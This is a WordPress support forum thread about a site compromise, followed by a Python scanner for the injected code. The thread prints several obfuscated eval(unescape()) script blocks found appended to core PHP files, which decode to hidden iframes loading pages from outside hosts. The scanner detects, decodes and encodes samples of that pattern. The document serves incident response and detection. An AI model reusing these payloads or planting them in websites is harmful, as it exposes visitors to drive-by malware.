• After noting a ‘headers already sent’ error, I found these three lines at the bottom of a WordPress ‘wp-config.php’ file today:

    <body>
    <script>eval(unescape('%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%73%72%63%3d%68%74%74%70%3a%2f%2f%73%6f%66%74%73%70%79%64%65%6c%65%74%65%2e%63%6f%6d%2f%64%6c%2f%30%38%39%2f%6e%65%77%2e%70%68%70%20%77%69%64%74%68%3d%31%20%68%65%69%67%68%74%3d%31%3e%3c%2f%69%66%72%61%6d%65%3e%27%29%3b'));</script>
    <script>eval(unescape('%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%73%72%63%3d%68%74%74%70%3a%2f%2f%73%6f%66%74%73%70%79%64%65%6c%65%74%65%2e%63%6f%6d%2f%64%6c%2f%6e%65%77%6e%65%77%2e%70%68%70%3f%61%64%76%3d%38%39%20%77%69%64%74%68%3d%31%20%68%65%69%67%68%74%3d%31%3e%3c%2f%69%66%72%61%6d%65%3e%27%29%3b'));</script>

    which, after a bit of processing, turn out to be these lines of JavaScript:

    document.write('<iframe src=http://softspydelete.com/dl/newnew.php?adv=89 width=1 height=1></iframe>');

    and

    document.write('<iframe src=http://softspydelete.com/dl/089/new.php width=1 height=1></iframe>');

    respectively.

    I’ve pulled these lines (which removed the ‘headers already sent’ error).

Viewing 3 replies - 1 through 3 (of 3 total)
  • Thread Starter wildeep

    (@wildeep)

    Other than updating to the most recent version of WP, what else should I be doing to reduce the number/severity of attacks?

    Thread Starter wildeep

    (@wildeep)

    found some more:

    at the bottom of wp-app.php

    nobody:nobody set to 644

    <body>
    <script>eval(unescape(‘%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%73%72%63%3d%68%74%74%70%3a%2f%2f%73%6f%66%74%73%70%79%64%65%6c%65%74%65%2e%63%6f%6d%2f%64%6c%2f%30%38%39%2f%6e%65%77%2e%70%68%70%20%77%69%64%74%68%3d%31%20%68%65%69%67%68%74%3d%31%3e%3c%2f%69%66%72%61%6d%65%3e%27%29%3b’));</script>
    <script>eval(unescape(‘%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%73%72%63%3d%68%74%74%70%3a%2f%2f%73%6f%66%74%73%70%79%64%65%6c%65%74%65%2e%63%6f%6d%2f%64%6c%2f%6e%65%77%6e%65%77%2e%70%68%70%3f%61%64%76%3d%38%39%20%77%69%64%74%68%3d%31%20%68%65%69%67%68%74%3d%31%3e%3c%2f%69%66%72%61%6d%65%3e%27%29%3b’));</script>

    at the bottom of wp-cron.php

    nobody:nobody set to 644

    <body>
    <script>eval(unescape(‘%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%73%72%63%3d%68%74%74%70%3a%2f%2f%68%69%67%68%74%73%74%61%74%73%2e%6e%65%74%2f%64%6c%2f%30%38%39%2f%6e%65%77%2e%70%68%70%20%77%69%64%74%68%3d%31%20%68%65%69%67%68%74%3d%31%3e%3c%2f%69%66%72%61%6d%65%3e%27%29%3b’));</script>
    <script>eval(unescape(‘%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%73%72%63%3d%68%74%74%70%3a%2f%2f%68%69%67%68%74%73%74%61%74%73%2e%6e%65%74%2f%64%6c%2f%6e%65%77%6e%65%77%2e%70%68%70%3f%61%64%76%3d%38%39%20%77%69%64%74%68%3d%31%20%68%65%69%67%68%74%3d%31%3e%3c%2f%69%66%72%61%6d%65%3e%27%29%3b’));</script>

    Moderator Samuel Wood (Otto)

    (@otto42)

    WordPress.org Admin

    What version of WordPress are you using? Older versions may be vulnerable to hacking. Upgrade to the latest version.


The topic ‘Potential hack attempt’ is closed to new replies.
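
The injected lines reported in this thread all share one shape: a `<script>` tag wrapping `eval(unescape('%XX%XX...'))`, appended to the end of a PHP file. The following is an added example, not code from any participant in the thread: a small scanner that finds that shape in `.php` files, decodes it, and reports the hidden iframe target. The function names, the sample file content and the `injected.example.test` domain are constructed for illustration.

```python
import re
from pathlib import Path
from urllib.parse import unquote

# Shape of the injected lines in the thread: <script>eval(unescape('%64%6f...'));</script>
# Typographic quotes are accepted too, because copies of the payload often carry them.
INJECT_RE = re.compile(
    r"<script[^>]*>\s*eval\(\s*unescape\(\s*['\"\u2018\u2019]((?:%[0-9a-f]{2})+)"
    r"['\"\u2018\u2019]\s*\)\s*\)\s*;?\s*</script>", re.IGNORECASE)
IFRAME_SRC_RE = re.compile(r"<iframe[^>]*?\bsrc\s*=\s*['\"]?([^\s'\">]+)", re.IGNORECASE)

def scan_text(text):
    """Return one finding per injected script block found in a file's text."""
    findings = []
    php_close = text.rfind("?>")
    for m in INJECT_RE.finditer(text):
        # JavaScript unescape() maps each %XX to one code point, i.e. Latin-1.
        decoded = unquote(m.group(1), encoding="latin-1")
        findings.append({
            "line": text.count("\n", 0, m.start()) + 1,
            "decoded": decoded,
            "iframe_srcs": IFRAME_SRC_RE.findall(decoded),
            # Heuristic: markup after the last "?>" is emitted as output on include,
            # which is what produces "headers already sent".
            "after_php_close": php_close != -1 and m.start() > php_close,
        })
    return findings

def scan_tree(root):
    """Scan every .php file under root; return {path: findings} for files with hits."""
    hits = {}
    for path in sorted(Path(root).rglob("*.php")):
        found = scan_text(path.read_text(encoding="utf-8", errors="replace"))
        if found:
            hits[str(path)] = found
    return hits

def encode_like_sample(js):
    """Percent-encode every character, matching the encoding style seen in the thread."""
    return "".join("%%%02x" % b for b in js.encode("latin-1"))

# Constructed sample input (reserved .test domain), not a payload from the thread.
SAMPLE_JS = ("document.write('<iframe src=http://injected.example.test/dl/new.php "
             "width=1 height=1></iframe>');")
SAMPLE_PHP = ("<?php\ndefine('WP_DEBUG', false);\n?>\n<body>\n<script>eval(unescape('"
              + encode_like_sample(SAMPLE_JS) + "'));</script>\n")

if __name__ == "__main__":
    for f in scan_text(SAMPLE_PHP):
        print(f["line"], f["after_php_close"], f["iframe_srcs"])
```

Calling `scan_tree()` on the WordPress root covers core files such as `wp-config.php`, `wp-app.php` and `wp-cron.php` in one pass; a hit in any of them means the file was modified outside of a normal update.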